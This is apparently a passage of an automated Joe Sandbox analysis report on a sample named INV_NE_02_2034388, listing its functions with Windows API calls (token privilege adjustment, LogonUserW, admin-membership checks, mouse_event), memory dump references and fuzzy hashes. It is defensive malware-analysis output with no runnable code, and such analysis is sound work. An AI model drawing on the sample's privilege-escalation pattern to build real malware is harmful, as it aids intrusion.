                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Internet$AvailableDataFileQueryRead
                                          • String ID:
                                          • API String ID: 599397726-0
                                          • Opcode ID: d3217ada22f57d27c47324fc3303e191d98c338249b7559d53ae04592ffd8b14
                                          • Instruction ID: 97e6fa55f52fdedc64eb36c533065f345fcd4e8e1beeb73d4f24c64f527f6271
                                          • Opcode Fuzzy Hash: d3217ada22f57d27c47324fc3303e191d98c338249b7559d53ae04592ffd8b14
                                          • Instruction Fuzzy Hash: 0941DA71604205BFEB20DE65DE81EFB77BCEB40314F10806FFA49A6241DABC9E419658
                                          Function 0046B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0046B343
                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DiskFreeSpace
                                          • String ID:
                                          • API String ID: 1682464887-0
                                          • Opcode ID: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                          • Instruction ID: 737ef1c34fd19c378388d330bbb387c55d680846c188baab6e7c30573ba64571
                                          • Opcode Fuzzy Hash: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                          • Instruction Fuzzy Hash: 7D21AE75A10108EFCB00EFA5D880AEEBBB8FF48314F0080AAE905AB351DB359D59CB55
                                          Function 004587E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                            • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                          • GetLastError.KERNEL32 ref: 00458865
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                          • String ID:
                                          • API String ID: 1922334811-0
                                          • Opcode ID: 81175457bd2116081fd482ae7269f4099234a407432aa681ee186d1b37444670
                                          • Instruction ID: 5e41a7b511489fb1457012ee205441660039eb57adee2e696ecce50f3e5e177b
                                          • Opcode Fuzzy Hash: 81175457bd2116081fd482ae7269f4099234a407432aa681ee186d1b37444670
                                          • Instruction Fuzzy Hash: 7511BFB2514204AFE718EFA4EC85D2BB7F8EB05315B60852EF85593212EF34BC448B64
                                          Function 0045874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
                                          • FreeSid.ADVAPI32(?), ref: 0045879B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                          • String ID:
                                          • API String ID: 3429775523-0
                                          • Opcode ID: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                          • Instruction ID: 222101879978235e3db2a0a583f2c1bf244a93baf2b2f2d6b5292d8d16c370cf
                                          • Opcode Fuzzy Hash: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                          • Instruction Fuzzy Hash: 4CF04F7591130CBFDF00DFF4DC89AAEB7BCEF09201F104879A901E2181D7756A088B54
                                          Function 00468889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          • __time64.LIBCMT ref: 0046889B
                                            • Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
                                            • Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Time$FileSystem__aulldiv__time64
                                          • String ID: 0eL
                                          • API String ID: 2893107130-3167399643
                                          • Opcode ID: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                          • Instruction ID: 2c57299538d283c5d644ae0a39161a0e0d0ec28ce0c746f6c7e9e831f8b60585
                                          • Opcode Fuzzy Hash: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                          • Instruction Fuzzy Hash: B421AF326256108BC729CF29D841A52B3E1EFA5311B698F6DD0F5CB2C0DA38A905CB58
                                          Function 0046C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
                                          • FindClose.KERNEL32(00000000), ref: 0046C72B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                          • Instruction ID: b4b64e4e0be63edce78860a78e1dfdfe78961efcf08952f795b51eb70efe8952
                                          • Opcode Fuzzy Hash: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                          • Instruction Fuzzy Hash: 411152726106049FDB10EF29D88592AF7E5EF85325F00C52EF9A5D7391DB34AC05CB85
                                          Function 0046A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ErrorFormatLastMessage
                                          • String ID:
                                          • API String ID: 3479602957-0
                                          • Opcode ID: 472a7cd9639d892b3363a091e7d83c08bd9bcb7ed13b50b01156cac8ad95666a
                                          • Instruction ID: 2c9db32d3ae4548df1de74cdb7d607b6943671b75e71bd67b23ca617ca970478
                                          • Opcode Fuzzy Hash: 472a7cd9639d892b3363a091e7d83c08bd9bcb7ed13b50b01156cac8ad95666a
                                          • Instruction Fuzzy Hash: D8F0823550522DABDB21AFA4CC48FEE776CBF08361F00416AF909E6191DA349954CBA6
                                          Function 004581CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                          • CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: AdjustCloseHandlePrivilegesToken
                                          • String ID:
                                          • API String ID: 81990902-0
                                          • Opcode ID: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
                                          • Instruction ID: 9bafbd08ffd8acbbb2d026fb6ea58a2c51283803ccb0941fee12b6a17b14d6d6
                                          • Opcode Fuzzy Hash: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
                                          • Instruction Fuzzy Hash: 13E04632000620AEE7212B61FC08D777BEAEB04314720882EB8A680431CF22AC90DB18
                                          Function 0042A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                          • Instruction ID: 9da78fce3b57c7d2137df8720d13279edd616241823e717daaa40eb201d223bb
                                          • Opcode Fuzzy Hash: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                          • Instruction Fuzzy Hash: CCB09231254308ABCA022B91EC09B8C3F68EB46AA2F404434FA0D84C60CB6254548B99
                                          Function 00526CC8 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 7=t>$::1
                                          • API String ID: 0-44347883
                                          • Opcode ID: 6fef08b035a3b0fb34a82f7d4a7e8eda193c1f1bc33809de8141ec4fdf1b8e03
                                          • Instruction ID: e65de11af0d9288a2b86fee44853faa7e893a504278164bbc372da0f62ced09f
                                          • Opcode Fuzzy Hash: 6fef08b035a3b0fb34a82f7d4a7e8eda193c1f1bc33809de8141ec4fdf1b8e03
                                          • Instruction Fuzzy Hash: 3551CE319897C99FDF228AB888953D67FA3AF472183DA00DBC4C04E05BD62595C7CB4B
                                          Function 0042F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                          • Instruction ID: 9dbe1c865c2330f56ffee62ed517aae1867acb93b770053fb6672ec4a27fddfc
                                          • Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                          • Instruction Fuzzy Hash: 08322861E29F114DD7239634D832336A258AFB73C8F95D737F819B5AA5EB28D4C34208
                                          Function 0043242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                          • Instruction ID: 6c6381ca5121d9a8a5ca5470a2620081c1b3ce1be078dbaf297b8ac86cff2730
                                          • Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                          • Instruction Fuzzy Hash: E2B10130E2AF414DD72396398935336BA5CAFBB2C5F51D72BFC2670D22EB2185934185
                                          Function 00464C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: mouse_event
                                          • String ID:
                                          • API String ID: 2434400541-0
                                          • Opcode ID: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                          • Instruction ID: b34e2a9394489d035c963e7dd8f40c9807a13273b0ab6c7f74163ad9f46ae88e
                                          • Opcode Fuzzy Hash: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                          • Instruction Fuzzy Hash: BED05EA032220838ECA807209D5FF7F1109E3C0B81F96854B7241853C1F8DC6801A03F
                                          Function 004587B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: LogonUser
                                          • String ID:
                                          • API String ID: 1244722697-0
                                          • Opcode ID: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                          • Instruction ID: bbaf709efb0beb88cdfa5f1a33ae6004459e2c5163e494cc38a8a30eb56211a1
                                          • Opcode Fuzzy Hash: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                          • Instruction Fuzzy Hash: 49D05E3226050EAFEF018EA4DC01EAE3B69EB04B01F408521FE15D50A1C775E835AB60
                                          Function 0042A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                          • Instruction ID: 5f0b767449e3d37fa0a9cb76ca1a1966b2bcebad2f74a673b8e7725f9ca30b43
                                          • Opcode Fuzzy Hash: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                          • Instruction Fuzzy Hash: E2A0113000020CAB8A022B82EC08888BFACEA022A0B008030F80C808228B32A8208A88
                                          Function 00418808 Relevance: .6, Instructions: 590COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                                          • Instruction ID: d3e05baf70842595a15b67714876080b4d37379fdc1224c105ba09137936e944
                                          • Opcode Fuzzy Hash: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                                          • Instruction Fuzzy Hash: 44223730904506CBDF288A68C4A47BEB7A1BF41345F28816FDD468B693DB7C9CD6C74A
                                          Function 004221C5 Relevance: .3, Instructions: 345COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
